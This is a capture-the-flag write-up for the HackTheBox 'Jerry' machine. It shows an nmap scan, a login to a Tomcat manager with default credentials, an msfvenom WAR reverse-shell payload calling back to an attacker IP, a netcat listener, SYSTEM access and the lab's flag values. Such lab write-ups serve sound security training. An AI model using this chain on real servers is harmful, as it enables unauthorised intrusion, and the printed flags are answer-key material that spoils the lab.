# Jerry

## Enumeration: ### Port Scanning: #### Nmap: ```bash ┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry] └─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.136.9 Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 12:46 +03 Nmap scan report for 10.129.136.9 Host is up, received echo-reply ttl 127 (0.14s latency). Scanned at 2025-09-18 12:46:24 +03 for 139s Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE REASON VERSION 8080/tcp open http syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1 |_http-server-header: Apache-Coyote/1.1 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/7.0.88 ``` We only have apache tomcat running on port 8080. Open it with `Firefox`:

We can see the version is shown above, and it is old, so we can find a multiple of exploits. ## Exploitaion: ### Get a reverse shell: I will click on manager app:

It will ask me for username and password:

We can try multiple combinations of default credentials, like admin:admin: We will get access denied, but it will show default credentials `tomcat:s3cret`:

Lets test them:

We successfully managed to authenticate. We can now upload a jsp file or war file and deploy, but first we should create the war file using `msfvenom`: ```bash ┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry] └─$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.16.16 LPORT=443 -f war -o shell.war Payload size: 13030 bytes Final size of war file: 13030 bytes Saved as: shell.war ``` Scroll down a bit, we will find (select war file to upload):

I will press browse, and upload the shell.war that I created:

Click on deploy, and we will see it in the applications table:

Start our `netcat` listener: ```bash ┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... ``` And click on that shell in the applications table, or naviagte to `IP:PORT/shell/`:

We will see a blank page, but when we go back to our listener: ```bash connect to [10.10.16.16] from (UNKNOWN) [10.129.136.9] 49198 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami nt authority\system C:\apache-tomcat-7.0.88>hostname JERRY C:\apache-tomcat-7.0.88>ipconfig Windows IP Configuration Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : .htb IPv6 Address. . . . . . . . . . . : dead:beef::19c5:d18d:c40a:d5cd Link-local IPv6 Address . . . . . : fe80::19c5:d18d:c40a:d5cd%12 IPv4 Address. . . . . . . . . . . : 10.129.136.9 Subnet Mask . . . . . . . . . . . : 255.255.0.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%12 10.129.0.1 Tunnel adapter isatap..htb: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : .htb ``` We can now get the flags: ```bash C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt" user.txt 7004dbcef0f854e0fb401875f26ebd00 root.txt 04a8b36e1545a455393d067e772fe90e ```